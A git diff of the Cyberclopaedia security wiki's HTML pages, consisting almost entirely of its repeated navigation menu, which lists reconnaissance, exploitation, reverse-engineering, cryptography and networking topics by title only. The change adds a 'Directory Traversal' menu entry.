    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -222,22 +222,6 @@

ARP Caching

- - diff --git a/docs/Networking/Protocols/Domain Name System (DNS)/DNS Protocol.html b/docs/Networking/Protocols/Domain Name System (DNS)/DNS Protocol.html index 8fb6c865..51698824 100644 --- a/docs/Networking/Protocols/Domain Name System (DNS)/DNS Protocol.html +++ b/docs/Networking/Protocols/Domain Name System (DNS)/DNS Protocol.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Networking/Protocols/Domain Name System (DNS)/The Domain Name System.html b/docs/Networking/Protocols/Domain Name System (DNS)/The Domain Name System.html index 3339b756..838d911d 100644 --- a/docs/Networking/Protocols/Domain Name System (DNS)/The Domain Name System.html +++ b/docs/Networking/Protocols/Domain Name System (DNS)/The Domain Name System.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
